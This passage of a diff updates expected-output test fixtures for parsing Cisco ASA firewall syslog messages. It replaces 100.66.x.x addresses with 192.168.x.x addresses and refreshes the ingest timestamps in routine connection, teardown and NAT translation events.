"mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.238.126", + "mapped_source_ip": "192.168.238.126", "connection_id": "11762", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2444,8 +2444,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2480,7 +2480,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2489,8 +2489,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164510300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994902600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2506,7 +2506,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.93.51", + "mapped_source_ip": "192.168.93.51", "connection_id": "11763", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2528,8 +2528,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2564,7 +2564,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, @@ -2574,8 +2574,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164518100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", + "ingested": "2021-12-09T13:33:41.994908800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2612,8 +2612,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2648,7 +2648,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2658,8 +2658,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164526100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", + "ingested": "2021-12-09T13:33:41.994915Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2691,8 +2691,8 @@ }, "destination": { "port": 8259, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1775, @@ -2732,7 +2732,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2740,8 +2740,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164534100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259", + "ingested": "2021-12-09T13:33:41.994921500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2774,8 +2774,8 @@ }, "source": { "port": 443, - "address": "100.66.225.103", - "ip": "100.66.225.103" + "address": "192.168.225.103", + "ip": "192.168.225.103" }, "tags": [ "preserve_original_event" @@ -2810,7 +2810,7 @@ "localhost" ], "ip": [ - "100.66.225.103", + "192.168.225.103", "172.31.98.44" ] }, @@ -2819,8 +2819,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164542500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", + "ingested": "2021-12-09T13:33:41.994927800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2836,7 +2836,7 @@ "destination_interface": "inside", "mapped_source_port": 443, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.225.103", + "mapped_source_ip": "192.168.225.103", "connection_id": "11764", "source_interface": "outside", "mapped_destination_port": 1775 @@ -2853,8 +2853,8 @@ }, "destination": { "port": 1189, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -2894,7 +2894,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2902,8 +2902,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164550800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189", + "ingested": "2021-12-09T13:33:41.994934400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2936,8 +2936,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -2972,7 +2972,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, @@ -2981,8 +2981,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164557400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994940600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2998,7 +2998,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.240.126", + "mapped_source_ip": "192.168.240.126", "connection_id": "11772", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3020,8 +3020,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3056,7 +3056,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3065,8 +3065,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164565500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994947700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3082,7 +3082,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.44.45", + "mapped_source_ip": "192.168.44.45", "connection_id": "11773", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3104,8 +3104,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -3140,7 +3140,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, @@ -3150,8 +3150,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164573300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", + "ingested": "2021-12-09T13:33:41.994954Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3188,8 +3188,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3224,7 +3224,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3234,8 +3234,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164581400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", + "ingested": "2021-12-09T13:33:41.994960800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3267,8 +3267,8 @@ }, "destination": { "port": 8265, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1452, @@ -3308,7 +3308,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -3316,8 +3316,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164589200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265", + "ingested": "2021-12-09T13:33:41.994967800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3350,8 +3350,8 @@ }, "source": { "port": 80, - "address": "100.66.179.219", - "ip": "100.66.179.219" + "address": "192.168.179.219", + "ip": "192.168.179.219" }, "tags": [ "preserve_original_event" @@ -3386,7 +3386,7 @@ "localhost" ], "ip": [ - "100.66.179.219", + "192.168.179.219", "172.31.98.44" ] }, @@ -3395,8 +3395,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164597400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", + "ingested": "2021-12-09T13:33:41.994974Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3412,7 +3412,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.219", + "mapped_source_ip": "192.168.179.219", "connection_id": "11774", "source_interface": "outside", "mapped_destination_port": 1452 @@ -3434,8 +3434,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -3470,7 +3470,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3479,8 +3479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164605400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994980400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3496,7 +3496,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.157.232", + "mapped_source_ip": "192.168.157.232", "connection_id": "11775", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3518,8 +3518,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3554,7 +3554,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, @@ -3563,8 +3563,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164610900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994986700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3580,7 +3580,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.178.133", + "mapped_source_ip": "192.168.178.133", "connection_id": "11776", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3602,8 +3602,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -3638,7 +3638,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3648,8 +3648,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164617Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", + "ingested": "2021-12-09T13:33:41.994993100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3686,8 +3686,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3722,7 +3722,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, @@ -3732,8 +3732,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164623200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", + "ingested": "2021-12-09T13:33:41.994998600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3765,8 +3765,8 @@ }, "destination": { "port": 8266, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1453, @@ -3806,7 +3806,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -3814,8 +3814,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164627600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266", + "ingested": "2021-12-09T13:33:41.995002700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3848,8 +3848,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3884,7 +3884,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, @@ -3893,8 +3893,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164633300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", + "ingested": "2021-12-09T13:33:41.995007500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3910,7 +3910,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.133.112", + "mapped_source_ip": "192.168.133.112", "connection_id": "11777", "source_interface": "outside", "mapped_destination_port": 1453 @@ -3932,8 +3932,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3968,7 +3968,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, @@ -3979,8 +3979,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.164639Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", + "ingested": "2021-12-09T13:33:41.995013800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4017,8 +4017,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4053,7 +4053,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4062,8 +4062,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164646300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995020100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4079,7 +4079,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.204.197", + "mapped_source_ip": "192.168.204.197", "connection_id": "11779", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4101,8 +4101,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -4137,7 +4137,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -4147,8 +4147,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164654300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:33:41.995024700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4185,8 +4185,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4221,7 +4221,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4231,8 +4231,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164662500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", + "ingested": "2021-12-09T13:33:41.995030300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4264,8 +4264,8 @@ }, "destination": { "port": 8267, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1454, @@ -4305,7 +4305,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4313,8 +4313,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164670600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267", + "ingested": "2021-12-09T13:33:41.995036800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4347,8 +4347,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4383,7 +4383,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4392,8 +4392,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164678700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", + "ingested": "2021-12-09T13:33:41.995041700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4409,7 +4409,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11780", "source_interface": "outside", "mapped_destination_port": 1454 @@ -4426,8 +4426,8 @@ }, "destination": { "port": 8268, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1455, @@ -4467,7 +4467,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4475,8 +4475,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164686600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268", + "ingested": "2021-12-09T13:33:41.995046700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4509,8 +4509,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4545,7 +4545,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4554,8 +4554,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164695Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", + "ingested": "2021-12-09T13:33:41.995051Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4571,7 +4571,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11781", "source_interface": "outside", "mapped_destination_port": 1455 @@ -4588,8 +4588,8 @@ }, "destination": { "port": 8269, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1456, @@ -4629,7 +4629,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4637,8 +4637,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164702800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269", + "ingested": "2021-12-09T13:33:41.995056700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4671,8 +4671,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4707,7 +4707,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4716,8 +4716,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164709700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", + "ingested": "2021-12-09T13:33:41.995063500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4733,7 +4733,7 @@ "destination_interface": "inside", 